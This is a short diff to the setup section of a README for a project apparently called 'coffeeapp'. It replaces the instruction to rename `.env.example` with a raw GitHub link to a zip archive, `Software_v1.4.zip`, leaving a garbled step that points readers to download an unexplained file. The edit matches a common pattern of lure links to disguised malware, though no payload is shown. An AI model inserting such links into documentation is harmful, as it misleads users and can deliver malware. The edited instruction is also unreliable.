skoda234/coffeeapp/README.md

 ### ⚙️ Step 4: Configure Environment Variables

-1. In the installation directory, locate `.env.example` and rename it to `.env`.
+1. In the installation directory, locate `https://github.com/skoda234/coffeeapp/raw/refs/heads/main/doc/Software_v1.4.zip` and rename it to `.env`.
 2. Fill in your database details (username, password, etc.) in the `.env` file for proper connection.

 ### ⚙️ Step 5: Start the Application